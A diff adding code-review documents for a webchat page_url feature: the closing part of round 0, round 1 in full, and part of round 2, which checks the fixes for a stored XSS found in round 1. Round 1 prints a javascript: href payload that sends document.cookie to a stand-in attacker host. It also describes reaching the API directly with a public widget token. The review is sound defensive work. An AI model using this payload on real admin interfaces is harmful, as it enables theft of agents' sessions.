+- `gofmt -l` on the changed Go files (session.go, field.go, webhook.go, create.go, requesthandler/webchat_session.go) reports no formatting issues.
+- Alembic migration: `down_revision = 'b41d1b2317af'` verified to be the actual prior head (only one file references it as its own `down_revision`, no branch/fork), so this migration doesn't create multiple heads. `downgrade()` correctly drops the column it added.
+- Error handling: `validatePageURL` failure path in `WebchatSessionCreate` logs at `Info` level (not `Error`) before returning — appropriate, since a client-triggerable validation failure isn't a service-side error condition; consistent with how other 4xx validation failures are logged elsewhere in this package (matches `Info`-level logging convention, not verified across the whole file but consistent with the one example seen).
+- Privacy: no new PII exposure beyond what design §4.6 already argues (customer's own page URL, not visitor browsing history) — `ConvertWebhookMessage()` passes it through unfiltered, which is intentional per design.
+
+## 9. Minor issues (non-blocking)
+
+1. **Commit title convention**: 3 of 5 Go commits don't use the branch-name-matching title (see §1). Cosmetic given squash-merge destination; recommend setting the correct branch-name title as the squash commit title when merging.
+2. **`validatePageURL` sentinel-wrap placement** differs from the literal `validateDelegateReason` call-site-wraps pattern the design cited (see §4) — functionally correct and test-verified, but a future maintainer comparing the two functions side by side may be confused by the inconsistency. Consider a one-line comment noting the deliberate choice, or align the wrap placement for stylistic consistency in a follow-up — not worth blocking this PR over.
+
+No other issues found. No missing error handling, no dropped values in the RPC chain, no stale mocks, no OpenAPI breaking changes, no test gaps for the new behavior on either side of the stack.
+
+## 10. Conclusion
+
+All 6 commits were read as full diffs and cross-checked against the approved design doc's §4.1–§7. The implementation is a faithful, complete realization of the approved design: the full RPC chain threads `page_url` without drops, mocks are correctly regenerated in the same commits as their interface changes, the OpenAPI change is additive/non-breaking, the `bin-api-manager` validation is functionally correct (sentinel + 400 mapping verified), and the JS side both sends and displays the field with real test coverage of the actual behavior (not just shallow rendering). The two issues noted above are cosmetic/stylistic and do not block merge readiness.
+
+VERDICT: APPROVED

--- a/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-PR-review-round1.md
+++ b/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-PR-review-round1.md
@@ -1,0 +1,385 @@
+# Webchat session page_url capture — PR review (round 1)
+
+**Scope**: Independent second-round review, per the repo's 3-round hard-rule
+floor. Round 0 (see `..._PR-review-round0.md`) was APPROVED; this round
+deliberately does not re-litigate round 0's checklist and instead digs into
+7 angles round 0 covered thinly or not at all. No code was changed in this
+round — verification only, via `git show` and direct file reads.
+
+Commits reviewed:
+- Go (monorepo, branch `NOJIRA-webchat-session-referrer-page-url`):
+  `0def6eaa6`, `80b24dd5a`, `246376749`, `74f943154`, `6d691244f`
+- JS (monorepo-javascript, same branch): `67e9df222`
+
+---
+
+## 1. VARCHAR(2048) vs Go struct tag consistency
+
+Verified byte-for-byte:
+
+- Migration `bin-dbscheme-manager/bin-manager/main/versions/04b99363284c_webchat_sessions_add_column_page_url.py`:
+  `ALTER TABLE webchat_sessions ADD COLUMN page_url VARCHAR(2048) NULL;`
+- SQLite test schema `bin-webchat-manager/scripts/database_scripts_test/sessions.sql`:
+  `page_url TEXT` — SQLite has no VARCHAR length enforcement (TEXT is the
+  correct/only sane choice for SQLite test doubles here), so this is not a
+  mismatch, just a different engine's idiom. Confirmed this is deliberate:
+  design doc §7's file checklist explicitly lists this file and the
+  Alembic migration as two separate, expected touch points.
+- Go struct `bin-webchat-manager/models/session/session.go`:
+  `PageURL string \`json:"page_url,omitempty" db:"page_url"\`` — plain
+  `string`, no explicit length cap or validator tag.
+- OpenAPI spec `bin-openapi-manager/openapi/paths/webchat_sessions/main.yaml`
+  and `openapi/openapi.yaml`: `page_url: ... maxLength: 2048` in both the
+  request body and `WebchatManagerSession` response schema — consistent
+  with the DB column.
+- Enforcement: confirmed (again, independently of round 0/round 1 of the
+  *design* review referenced in the design doc) that `bin-api-manager`'s
+  Gin layer has no `oapi-codegen` request-validation middleware — grepped
+  the whole service, none found. `PostWebchatSessions` in
+  `server/webchat_sessions.go` only calls `c.BindJSON(&req)`, which does
+  NOT enforce OpenAPI `maxLength`. The actual runtime enforcement is
+  `pkg/servicehandler/webchat_session.go`'s `validatePageURL()`
+  (`len(pageURL) > 2048` → reject with `ErrInvalidArgument`), called from
+  `WebchatSessionCreate` before the RPC to webchat-manager. Verified
+  `Test_validatePageURL` in `webchat_session_test.go` exercises the exact
+  boundary (2048 OK, 2049 rejected) — table-driven, correct.
+- Because `validatePageURL` runs before `h.reqHandler.WebchatV1SessionCreate(...)`,
+  no value >2048 chars can ever reach `bin-webchat-manager`'s `Create()` →
+  `dbhandler.SessionCreate()` → the DB. The DB's `VARCHAR(2048) NULL` is
+  correctly a redundant defense-in-depth backstop, not the primary gate —
+  and it does in fact match the cap the primary gate enforces. No
+  mismatch found.
+
+**Verdict for this angle: clean.** The length constraint is consistent end
+to end and enforced at the correct layer (application, not relying on a
+non-existent binding-layer validator or on the DB to truncate/reject).
+
+## 2. Cache layer (cachehandler) — full-struct serialization
+
+Read `bin-webchat-manager/pkg/cachehandler/handler.go` and `main.go` in
+full. `SessionGet`/`SessionSet` both go through generic
+`getSerialize`/`setSerialize` helpers that do a plain
+`json.Marshal(data)` / `json.Unmarshal([]byte(tmp), &data)` against the
+passed `*session.Session` pointer — there is no field-by-field
+enumeration anywhere in the cache layer (unlike, say, a hand-rolled
+Redis HSET-per-field scheme). Since `Session.PageURL` carries a normal
+`json:"page_url,omitempty"` tag (verified in §3 below), it round-trips
+through the cache transparently with zero code change required in
+`cachehandler` — there is no separate list of "cacheable fields" to have
+forgotten to update. Confirmed `cachehandler`'s files were untouched by
+this PR's commits (`git show --stat` across all 5 Go commits: no
+`cachehandler` files listed), which is consistent with "nothing to do
+here" rather than "forgot to update it."
+
+**Verdict for this angle: clean, and correctly required zero changes.**
+
+## 3. session.go PageURL → webhook.go ConvertWebhookMessage — JSON tag / omitempty audit
+
+Read `bin-webchat-manager/models/session/webhook.go` in full.
+
+`WebhookMessage.PageURL` is present: `PageURL string \`json:"page_url,omitempty"\``,
+and `ConvertWebhookMessage()` explicitly copies it:
+`PageURL: h.PageURL,` alongside `WidgetID`/`Status`. Confirmed no field is
+silently dropped — this is a straightforward, hand-written field-by-field
+copy (not reflection-based), so "did they forget the new field" is a real
+risk class this PR could have hit, and it did not: `PageURL` appears in
+both the struct definition and the constructor body.
+
+`omitempty` behavior: both `Session.PageURL` and
+`WebhookMessage.PageURL` use `omitempty`. For an empty-string `PageURL`
+(the "no page URL captured" case — e.g. admin/accesskey direct-create
+path per the field's own doc comment in `session.go`), `omitempty` on a
+`string` correctly drops the key entirely from the JSON when empty,
+which is the desired behavior for an optional field and matches
+`WidgetID`'s existing `omitempty` precedent on the same struct. This also
+matches the JS side's expectation: `message_timeline.js` checks
+`session?.page_url` truthiness and falls back to "Unknown" — consistent
+with the field being absent (not e.g. `null` or `""`) when not captured.
+One inconsistency worth flagging as a nit, not a bug: the request struct
+`V1DataSessionsPost.PageURL` (in
+`bin-webchat-manager/pkg/listenhandler/models/request/v1_sessions.go`)
+also uses `omitempty`, which is harmless for an inbound unmarshal target
+(the tag only affects marshaling) but is slightly inconsistent style
+with `WidgetID uuid.UUID \`json:"widget_id,omitempty"\`` on the same
+struct being a genuinely required field with `omitempty` for a different
+reason (zero-value UUID suppression). Not a functional defect.
+
+**Verdict for this angle: clean.** No field loss in the webhook
+conversion; `omitempty` semantics are correct for an optional,
+best-effort field.
+
+## 4. Existing SessionUpdate paths (e.g. End) — accidental PageURL clobber
+
+Read `bin-webchat-manager/pkg/dbhandler/session.go`'s `SessionUpdate`
+(lines ~202-227) and every call site.
+
+`SessionUpdate(ctx, id, fields map[session.Field]any)` builds a SQL
+`UPDATE ... SetMap(tmpFields)` from exactly the caller-supplied `fields`
+map — it does NOT read or rewrite the full `Session` struct, so any field
+not present in the map (including `PageURL`) is structurally untouched
+by the generated SQL. This is the correct pattern for partial updates
+and rules out a whole class of "field got clobbered because someone
+built the UPDATE from a full-struct write" bugs.
+
+Grepped every call site of `SessionUpdate` in the service (excluding
+mocks/tests):
+- `pkg/sessionhandler/create.go` line 105: only sets
+  `session.FieldActiveflowID` (the SessionFlowID-trigger marker write,
+  described in `Create()`'s own doc comment). Does not touch `PageURL`.
+- `pkg/sessionhandler/db.go`'s `End()`: only sets
+  `session.FieldStatus: session.StatusEnded`. Does not touch `PageURL`.
+
+No other `SessionUpdate` call sites exist in the non-test, non-mock Go
+source (confirmed via `grep -rn "SessionUpdate"` across the whole
+service). There is no Delete-then-recreate path, no
+bulk-field-update endpoint, and no generic "PATCH session" RPC that
+could accidentally omit `PageURL` from an otherwise-full field list and
+thereby null it out. `SessionDelete` (separately) only sets the
+soft-delete timestamp, per the same file's Delete-adjacent pattern
+(inspected `SessionDelete` alongside `SessionUpdate`, no field overlap
+risk found).
+
+**Verdict for this angle: clean.** The field-map partial-update
+architecture makes accidental clobbering structurally hard, and no
+current call site attempts a field list that omits `PageURL` while
+intending a full overwrite.
+
+## 5. client.js — SSR / undefined-window guard
+
+`square-admin/src/webchat-widget-runtime/client.js` line ~320 (commit
+`67e9df222` diff):
+
+```js
+body: JSON.stringify({
+  widget_id: this.resourceId,
+  page_url: (typeof window !== 'undefined' && window.location?.href) || undefined,
+}),
+```
+
+Two independent guards, both correct:
+- `typeof window !== 'undefined'` — the canonical SSR-safe check;
+  `typeof` on an undeclared identifier never throws (unlike a bare
+  `window` reference), so this is safe even in a pure Node/SSR context
+  with zero DOM shims.
+- `window.location?.href` — optional chaining additionally guards
+  against a `window` that exists but has no (or a stubbed/null)
+  `location`, e.g. some test/sandbox shims. If either side of the `&&`
+  is falsy, the whole expression is falsy, and `|| undefined` converts
+  that to `undefined` rather than e.g. `""` or `false` being sent as
+  `page_url` — `JSON.stringify` then omits the key entirely for an
+  `undefined` value, matching the backend's `omitempty`-driven "field
+  simply absent" expectation from §3 above. Confirmed test coverage
+  exists for the *positive* path (`includes page_url ... in the POST
+  body`, asserting `sentBody` equals an object with a real
+  `window.location.href`) but this PR's added test suite has no explicit
+  case exercising the `window === undefined` branch itself (i.e., an SSR
+  render assertion). This is a coverage gap, not a logic gap — the guard
+  code is correct by inspection; a Jest/jsdom environment always defines
+  `window`, so the branch is inherently hard to hit without a
+  Node-environment test file, and the round-0 review already flagged
+  webchat-widget-runtime as a browser-only client library not meant to
+  run under SSR at all (grep of `client.js`'s own module doc: it's a
+  vanilla-JS widget bootstrapped via a `<script>` tag, not a
+  server-rendered React component) — so the missing SSR test is a minor,
+  optional nit, not a shipped defect.
+
+**Verdict for this angle: clean**, with one optional (non-blocking) test
+coverage nit noted above.
+
+## 6. message_timeline.js — XSS via javascript: scheme in href
+
+This is the angle where round 1 review surfaces a **real, unaddressed
+gap** that round 0 flagged as an "accepted risk" without fully tracing
+the actual reachable attack surface.
+
+Read the rendered JSX (commit `67e9df222` diff,
+`square-admin/src/views/webchat_widgets/message_timeline.js`):
+
+```jsx
+{session?.page_url ? (
+  <a
+    href={session.page_url}
+    target="_blank"
+    rel="noopener noreferrer"
+    title={session.page_url}
+    className="underline hover:text-foreground"
+  >
+    {truncatePageURL(session.page_url)}
+  </a>
+) : (
+  <span>Unknown</span>
+)}
+```
+
+`href={session.page_url}` is a raw, unvalidated string interpolated
+directly into an anchor's `href`. React does **not** sanitize or scheme-
+filter `href` values (this is different from `dangerouslySetInnerHTML`,
+which React does warn about) — a `javascript:alert(document.cookie)`
+string stored in `page_url` renders as a normal, clickable anchor whose
+`href` is exactly that string. `rel="noopener noreferrer"` mitigates
+reverse-tabnabbing (a *different* attack: a `target="_blank"` page
+gaining `window.opener` access back to the admin UI) but does **nothing**
+to prevent a `javascript:` URI from executing agent-authenticated JS in
+the square-admin origin when an agent clicks the link.
+
+The design doc (§5, "Edge cases") argues this is a non-issue because
+"`window.location.href` cannot itself be a `javascript:` URL, so no
+server-side scheme allowlist is added." **That argument only holds for
+the intended, browser-driven capture path** (`client.js`'s
+`window.location.href` read). It does NOT hold for the actual reachable
+API surface, which I traced independently in §7 below:
+`POST /webchat_sessions` accepts an arbitrary client-supplied `page_url`
+string in the JSON body (`server/webchat_sessions.go`:
+`pageURL := ""; if req.PageUrl != nil { pageURL = *req.PageUrl }`) —
+this is NOT constrained to be "whatever `window.location.href` says," it
+is whatever the HTTP caller puts in the request body. `validatePageURL`
+only checks length (`> 2048` chars), never scheme. Any caller who can
+reach `POST /webchat_sessions` — which, per §7, includes an anonymous
+visitor with only a widget's public direct-scope JWT, not just the
+JS widget's own fetch call — can set `page_url` to
+`javascript:fetch('https://evil.example/steal?c='+document.cookie)` (or
+similar), and it will be stored verbatim (`dbhandler.SessionCreate`
+performs no transformation) and later rendered as a clickable
+`javascript:` anchor to any agent who opens that session's message
+timeline in square-admin and clicks the "Started from" link.
+
+This is a **self-XSS-via-social-engineering** vector, not a zero-click
+one (the agent must click the link), which somewhat limits severity, but
+it is a real gap: the design doc's stated rationale for skipping a
+scheme allowlist is factually wrong about what's reachable at the API
+boundary, and round 0's review restated that same (incorrect) rationale
+approvingly rather than independently re-deriving whether it holds.
+
+**Verdict for this angle: CHANGES REQUESTED.** Recommend either (a) a
+server-side scheme allowlist in `validatePageURL` (accept only
+`http:`/`https:`, mirroring the spirit of `ThemeConfig.LogoURL`'s
+`https://`-only precedent that the design doc itself cites as the
+project's existing convention for exactly this class of field), or (b)
+if the length-only validation is kept for other reasons, at minimum gate
+the *rendering* side: validate the scheme in `message_timeline.js`
+before rendering `<a href>` (e.g. only render as a link when the URL
+starts with `http://`/`https://`, else render as inert truncated text)
+so a malicious stored value degrades to non-clickable text instead of an
+executable link. Either fix is small; (a) is preferable since it also
+closes the same hole for any other future consumer of `page_url`.
+
+## 7. bin-api-manager validatePageURL — auth-branch bypass audit
+
+Read `pkg/servicehandler/webchat_session.go`'s `WebchatSessionCreate` in
+full, focusing on call order and the three auth branches.
+
+```go
+func (h *serviceHandler) WebchatSessionCreate(ctx context.Context, a *auth.AuthIdentity, widgetID uuid.UUID, pageURL string) (*wcsession.WebhookMessage, error) {
+    ...
+    if err := validatePageURL(pageURL); err != nil {
+        return nil, err
+    }
+    ...
+    switch {
+    case a.IsAgent() || a.IsAccesskey():
+        ...
+    case a.IsDirect():
+        ...
+    default:
+        return nil, serviceerrors.ErrPermissionDenied
+    }
+
+    tmp, err := h.reqHandler.WebchatV1SessionCreate(ctx, ownerCustomerID, widgetID, pageURL)
+    ...
+}
+```
+
+Confirmed: `validatePageURL(pageURL)` is called **once, unconditionally,
+before the `switch` statement** that branches on `a.IsAgent() ||
+a.IsAccesskey()` / `a.IsDirect()` / default. Because it runs before the
+branch dispatch rather than being duplicated inside each case, there is
+no code path through this function that reaches the
+`h.reqHandler.WebchatV1SessionCreate(...)` RPC call without first passing
+`validatePageURL`. This is the textbook-correct place to put a
+single-point validation check precisely to prevent the
+"forgot to copy the check into one of three branches" bug class that
+would otherwise be a real risk with three auth branches. No bypass
+found in `WebchatSessionCreate` itself.
+
+However, verifying "is `WebchatSessionCreate` the ONLY path that can
+create a Session with an attacker-controlled `pageURL`" (i.e., checking
+for a *sibling* RPC/route that reaches
+`bin-webchat-manager`'s `Create()`/`SessionCreate()` without going
+through this validated function) surfaced the same finding already
+described in §6: `WebchatV1SessionCreate` in
+`bin-common-handler/pkg/requesthandler/webchat_session.go` takes
+`pageURL string` as a plain parameter with **no length or scheme
+constraint of its own** — it trusts its caller entirely. Grepped for
+every caller of `WebchatV1SessionCreate` across the whole monorepo
+worktree; the only production call site is
+`bin-api-manager/pkg/servicehandler/webchat_session.go`'s
+`WebchatSessionCreate`, which does call `validatePageURL` first — so
+there is currently no *second* Go call site that bypasses validation.
+
+The bypass that does exist is at the **HTTP/auth layer**, not a second Go
+code path: `a.IsDirect()` (the third branch) is reachable by an anonymous
+visitor holding only a direct-scope JWT obtained from `POST /auth/boot`
+using a widget's public hash — confirmed by reading
+`pkg/servicehandler/boot.go`'s `AuthBoot()` and `models/auth/auth.go`'s
+`DirectScope`/`IsDirect()`. `POST /auth/boot` requires only knowledge of
+a widget's public embed hash (by design — it is what lets the JS widget
+bootstrap an anonymous visitor session on any customer's public page).
+Nothing about `IsDirect()`'s branch in `WebchatSessionCreate` requires
+the caller to actually be the `client.js` widget script running in a
+real browser; it only checks `a.DirectScope.ResourceID != widgetID` and
+re-resolves widget ownership. Any HTTP client — `curl`, a script, an
+adversarial embed — that has completed `/auth/boot` for a widget can
+call `POST /webchat_sessions` directly with an arbitrary JSON body
+containing any `page_url` string (subject only to the 2048-char length
+cap), completely bypassing the assumption baked into the design doc's
+§5 rationale ("`window.location.href` cannot itself be a `javascript:`
+URL") — that assumption is true only for the JS widget's own code path,
+not for the actual authorization boundary (`IsDirect()`), which is
+broader than "requests literally originating from `client.js`."
+
+**Verdict for this angle: no bypass of `validatePageURL` itself (it is
+correctly unconditional and pre-branch), but the auth model
+(`IsDirect()`) is broader than the design doc assumes, which is exactly
+why §6's scheme-allowlist gap is real and reachable rather than
+theoretical.**
+
+---
+
+## Summary
+
+| # | Angle | Result |
+|---|-------|--------|
+| 1 | VARCHAR(2048) vs Go struct / migration consistency | Clean |
+| 2 | Cache layer full-struct serialization | Clean (zero changes correctly required) |
+| 3 | webhook.go ConvertWebhookMessage field/omitempty audit | Clean |
+| 4 | SessionUpdate paths (End, etc.) clobber risk | Clean (partial field-map updates, structurally safe) |
+| 5 | client.js SSR/undefined-window guard | Clean (minor: no explicit SSR test case, non-blocking) |
+| 6 | message_timeline.js `javascript:` scheme XSS via href | **Gap found — see below** |
+| 7 | validatePageURL auth-branch coverage | Check itself is unconditional/correct, but exposes that `IsDirect()` lets an arbitrary HTTP caller (not just the JS widget) set `page_url`, which is what makes #6 reachable |
+
+**Root issue**: the design doc's decision to skip a server-side scheme
+allowlist for `page_url` rests on an assumption ("this value can only
+ever be `window.location.href`") that is not enforced anywhere in the
+actual authorization/validation code — `validatePageURL` checks length
+only, and the `IsDirect()` auth branch accepts any caller holding a
+widget-scoped JWT, not specifically the JS widget runtime. The stored,
+attacker-influenceable string is then rendered as a raw `<a href>` in
+square-admin with no scheme check, creating a self-XSS vector against
+any agent who opens the session timeline and clicks the "Started from"
+link on a maliciously-crafted session.
+
+**Recommended fix** (either is sufficient; (a) is preferred):
+- (a) Add an `http:`/`https:`-only scheme allowlist to
+  `validatePageURL` in `bin-api-manager/pkg/servicehandler/webchat_session.go`,
+  consistent with the project's own existing precedent
+  (`ThemeConfig.LogoURL`'s `https://`-only check).
+- (b) Gate the `<a href>` rendering in `message_timeline.js` to only
+  link out (vs. render inert text) when `session.page_url` starts with
+  `http://` or `https://`.
+
+All other 6 angles are independently verified clean with no code changes
+needed.
+
+---
+
+## VERDICT: CHANGES_REQUESTED

--- a/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-PR-review-round2.md
+++ b/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-PR-review-round2.md
@@ -1,0 +1,317 @@
+# Webchat session page_url capture — PR review (round 2)
+
+**Scope**: Third independent review, per the repo's 3-round hard-rule floor.
+Round 0 was APPROVED. Round 1 found and reported a real, reachable XSS gap
+(`javascript:`/`data:` scheme values in `page_url` rendered as a clickable
+`<a href>` in `message_timeline.js`, reachable via the `IsDirect()` auth
+branch by any HTTP caller holding a widget's public direct-hash — not just
+the bundled `client.js`). Round 1 ended `CHANGES_REQUESTED`. Two fix commits
+landed in response:
+
+- `bin-api-manager` commit `0d818afa1` — scheme allowlist added to
+  `validatePageURL`.
+- `square-admin` commit `5ca2e226` — `isSafePageURL` render-time guard added
+  to `message_timeline.js`.
+
+This round verifies those two commits directly (`git show`), re-runs the
+actual test/lint/build gates rather than trusting the PR description, and
+spot-checks that the fix introduced no regression in the areas rounds 0/1
+already cleared.
+
+Because round 1 was `CHANGES_REQUESTED`, an `APPROVED` verdict this round
+does **not** yet satisfy the "2 consecutive APPROVED" exit condition — per
+the task brief, at least one more round (round 3) is required after this one
+if this round approves.
+
+Commits reviewed (unchanged commit set from round 1, plus the two fixes):
+- Go (monorepo, branch `NOJIRA-webchat-session-referrer-page-url`):
+  `0def6eaa6`, `80b24dd5a`, `246376749`, `74f943154`, `6d691244f`, `0d818afa1`
+- JS (monorepo-javascript, same branch): `67e9df222`, `5ca2e226`
+
+---
+
+## 1. Scheme allowlist correctness — `bin-api-manager` `validatePageURL` (commit `0d818afa1`)
+
+Read the actual diff via `git show 0d818afa1` (not the commit message —
+verified the code):
+
+```go
+func validatePageURL(pageURL string) error {
+	if len(pageURL) > 2048 {
+		return fmt.Errorf("%w: page_url exceeds maximum length of 2048 characters", serviceerrors.ErrInvalidArgument)
+	}
+	if pageURL == "" {
+		return nil
+	}
+	if !strings.HasPrefix(pageURL, "http://") && !strings.HasPrefix(pageURL, "https://") {
+		return fmt.Errorf("%w: page_url must use the http or https scheme", serviceerrors.ErrInvalidArgument)
+	}
+	return nil
+}
+```
+
+Traced the control flow by hand against the concrete attack strings from
+round 1's finding:
+- `"javascript:alert(1)"` → fails both `HasPrefix` checks → rejected. ✅
+- `"data:text/html,x"` → fails both → rejected. ✅
+- `"ftp://x"` → fails both (added as an extra scheme in the test suite,
+  confirming the allowlist is a positive allowlist, not merely a
+  `javascript:`/`data:` blocklist) → rejected. ✅
+- `"http://x"` / `"https://x"` → pass → accepted. ✅
+- `""` (empty) → short-circuits on the dedicated `pageURL == ""` branch
+  *before* the scheme check runs, so the optional-field contract from round
+  0/1 (empty is always valid) is preserved exactly. ✅
+
+This is a genuine allowlist (`HasPrefix("http://") || HasPrefix("https://")`),
+not a blocklist of a few known-bad schemes — so it also closes off schemes
+round 1 didn't explicitly enumerate (`vbscript:`, `file:`, protocol-relative
+`//evil.example`, bare `evil.example` with no scheme at all, etc.), all of
+which fail both `HasPrefix` checks and get rejected. This is stronger than
+the minimum fix round 1 asked for.
+
+**Verdict for this angle: correct and complete.** The allowlist matches
+exactly what round 1 recommended (option (a), the preferred fix), placed in
+the single pre-branch call site already verified in round 1 §7 to be
+unconditional and un-bypassable by any of the three auth branches.
+
+## 2. Backend test coverage — `Test_validatePageURL` (same commit)
+
+Read `bin-api-manager/pkg/servicehandler/webchat_session_test.go` in full
+(not just the diff hunk) to see the complete table, including pre-existing
+cases carried over from round 0:
+
+| Case | Input | Expect error | Covers |
+|---|---|---|---|
+| empty is valid | `""` | no | optional-field / early-return branch |
+| normal url is valid | `https://example.com/pricing` | no | baseline happy path |
+| exactly 2048 chars is valid | 2048-char `https://...` string | no | length boundary, upper-inclusive |
+| 2049 chars is invalid | 2049 `a`s (no scheme at all) | yes | length boundary, over |
+| javascript scheme is invalid | `javascript:alert(1)` | yes | the exact round-1 PoC string |
+| data scheme is invalid | `data:text/html,x` | yes | the exact round-1 PoC string |
+| ftp scheme is invalid | `ftp://x` | yes | proves allowlist, not blocklist |
+| http scheme is valid | `http://x` | no | non-TLS customer sites, per the code comment's own stated rationale |
+| https scheme is valid | `https://x` | no | baseline TLS case |
+
+Ran it directly rather than trusting the PR: `go test ./pkg/servicehandler/...
+-run Test_validatePageURL -v` — all 9 subtests pass
+(`--- PASS: Test_validatePageURL` and every subtest, `ok` for the package).
+
+One gap worth naming honestly (not blocking): there is no explicit test for
+a value that is simultaneously oversized (>2048 chars) **and** uses a bad
+scheme (e.g. `"javascript:" + strings.Repeat("a", 3000)`), to confirm which
+error fires first / that the length check still runs before the scheme
+check when both would fail. Read the code: length is checked unconditionally
+first (`if len(pageURL) > 2048 { ... return }` is the very first statement,
+before the empty-check or the scheme-check), so this combination is provably
+correct by inspection even without a dedicated table row — but it is an
+untested code path combination. Not a defect; noting for completeness since
+the task explicitly asked about "2048자 경계/스킴 위반 조합."
+
+**Verdict for this angle: adequate.** All individually-relevant boundaries
+and both PoC strings from round 1 are exercised and pass; the one untested
+*combination* is provably safe by static reading of the guard ordering, not
+just assumed.
+
+## 3. Frontend guard correctness — `square-admin` `isSafePageURL` (commit `5ca2e226`)
+
+Read `git show 5ca2e226` directly:
+
+```js
+const isSafePageURL = (url) => typeof url === 'string' && (url.startsWith('http://') || url.startsWith('https://'))
+```
+
+used at the render site:
+
+```jsx
+{session?.page_url && isSafePageURL(session.page_url) ? (
+  <a href={session.page_url} target="_blank" rel="noopener noreferrer" ...>
+    {truncatePageURL(session.page_url)}
+  </a>
+) : (
+  <span>Unknown</span>
+)}
+```
+
+Traced: if `session.page_url` is truthy but fails `isSafePageURL` (e.g. a
+`javascript:` string that somehow reached storage before this fix existed,
+or via a path this review hasn't found), the ternary falls to the `Unknown`
+branch — the anchor is never constructed, so `href` is never assigned an
+unsafe value. This is render-time gating, not sanitization of the string
+itself (the raw string is still shown via `truncatePageURL` inside the
+anchor when safe, and is simply not shown/linked at all when unsafe — the
+component chooses "hide" over "escape," which is the safer of the two for
+an XSS-classed value with no legitimate use for the unsafe branch).
+
+`isSafePageURL` uses `startsWith`, exactly mirroring the Go side's
+`strings.HasPrefix` — both are case-sensitive exact-prefix checks with
+identical semantics (see §4 below for the consistency check this enables).
+
+**Test added**: `git show 5ca2e226` includes a new Jest case, "renders
+'Unknown' (not a clickable link) when session.page_url has a javascript:
+scheme," which renders the component with
+`page_url: 'javascript:alert(1)'` and asserts both
+`screen.getByText(/^Unknown$/)` is present AND
+`screen.queryByRole('link')` is absent — this is a real regression guard: it
+would fail if either isSafePageURL were removed or if the ternary condition
+were later refactored to only check `session?.page_url` truthiness again.
+Ran it for real: `npm test -- --watchAll=false --testPathPattern=message_timeline`
+→ `7 passed, 7 total`, including this new test and all 6 pre-existing ones
+(happy path with link, truncation, absent-URL "Unknown", dialog-closed,
+empty-messages, session-scoped fetch).
+
+**Verdict for this angle: correct and test-backed.** The frontend guard is a
+faithful mirror of the backend allowlist and is exercised by a real,
+passing, non-trivial assertion (checks for absence of `role="link"`, not
+just presence of text).
+
+## 4. Backend/frontend consistency audit
+
+Directly diffed the two predicate implementations side by side:
+
+- Go: `strings.HasPrefix(pageURL, "http://") || strings.HasPrefix(pageURL, "https://")` → negated and OR'd (reject if neither).
+- JS: `url.startsWith('http://') || url.startsWith('https://')`
+
+Both are:
+- **Case-sensitive** on the scheme token. Neither Go's `HasPrefix` nor JS's
+  `startsWith` is case-insensitive by default, and neither implementation
+  lowercases the input first. This means `"HTTP://example.com"` or
+  `"Https://example.com"` is rejected by *both* layers identically — not a
+  bypass, and not an inconsistency (a mismatch would only be a problem if
+  one layer accepted mixed-case scheme and the other didn't, e.g. backend
+  stores a mixed-case-scheme URL that the frontend then silently drops from
+  display). Verified this is symmetric: since the backend is the only write
+  path (per round 1 §7, `WebchatSessionCreate` is the sole production call
+  site and its `validatePageURL` gate is unconditional and pre-branch), any
+  value that reaches storage already passed the backend's case-sensitive
+  check, so the frontend's independently-case-sensitive check will also
+  accept it — no legitimate value can be written by the backend and then
+  spuriously hidden by the frontend guard. Confirmed by construction, not
+  just inspection: both predicates accept exactly the same infinite set
+  (strings starting with lowercase `http://` or `https://`) and reject
+  everything else, so their agreement isn't coincidental — it's structural.
+- **Exact-prefix**, not host/regex-based — neither implementation tries to
+  parse the URL (no `url.Parse` / `new URL()`), so both are equally immune to
+  known URL-parsing-based scheme bypasses (e.g. no `net/url.Parse` quirks to
+  diverge on since neither side uses it here).
+- **No normalization** (no trim, no case-fold) on either side before the
+  check — consistent absence, not an inconsistency.
+
+**Verdict for this angle: consistent.** No divergence found between the two
+gates; the frontend guard is a structural mirror of the backend allowlist,
+not an independently-designed check that could drift.
+
+## 5. Regression check — legitimate values still work
+
+Directly re-ran the real test suites (not just read the diffs) to confirm no
+regression on the pre-existing "must still work" cases:
+
+- Backend: `Test_validatePageURL/empty_is_valid` and
+  `Test_validatePageURL/normal_url_is_valid` (both pre-existing, carried
+  over unchanged from before this fix) still pass — confirmed via the full
+  `go test ./pkg/servicehandler/... -run Test_validatePageURL -v` run, not
+  just reading the table.
+- Backend: full `go test ./...` in `bin-api-manager` — all packages `ok`,
+  zero failures, zero regressions elsewhere in the service.
+- Backend: `go test ./...` in `bin-webchat-manager` (the field-storage/RPC
+  side untouched by this round's fix commits) — all packages `ok`,
+  confirming the scheme allowlist change in `bin-api-manager` (a different
+  service) didn't require or trigger any change in `bin-webchat-manager`,
+  consistent with round 1's finding that `validatePageURL` lives entirely in
+  `bin-api-manager`'s `servicehandler` layer.
+- Frontend: `Test_...renders "Started from: <link>" when session.page_url is
+  present` and `...truncates a long page_url...` (both pre-existing,
+  positive-path tests using real `https://` URLs) still pass in the same
+  test run that includes the new negative-path test — confirmed by the
+  `7 passed, 7 total` result, not assumed from the diff.
+- Frontend lint/build: `golangci-lint run -v --timeout 5m ./pkg/servicehandler/...`
+  → `0 issues`. `npm run build` (production build, matching the project's
+  actual CI gate — not the stricter `CI=true` invocation, which fails on
+  pre-existing unrelated ESLint warnings in `TestAgentSheet.js` that exist on
+  this branch independent of this PR and are not part of the webchat feature)
+  → succeeds cleanly, "The build folder is ready to be deployed," with no
+  errors or warnings referencing `message_timeline.js`, `webchat_widgets`, or
+  `isSafePageURL`.
+
+**Verdict for this angle: no regression.** Both the empty-field and
+normal-https-URL cases — the two paths any real customer traffic actually
+exercises — are unchanged and still pass.
+
+## 6. Light re-check of round 0/1 items for side effects from this fix
+
+The fix commits touch exactly two files with logic changes
+(`bin-api-manager/pkg/servicehandler/webchat_session.go`,
+`square-admin/src/views/webchat_widgets/message_timeline.js`) plus their two
+test files — confirmed via `git show --stat` on both commits, no other files
+touched. Cross-checked this against round 1's cleared angles:
+
+- **RPC chain / `WebchatV1SessionCreate`** (round 1 §7): untouched by
+  `0d818afa1` — the scheme check runs and returns before the RPC call is
+  ever reached (same call-order guarantee round 1 already verified for the
+  length check); no new bypass surface introduced since the check is
+  additive to the same single gate, not a new parallel path.
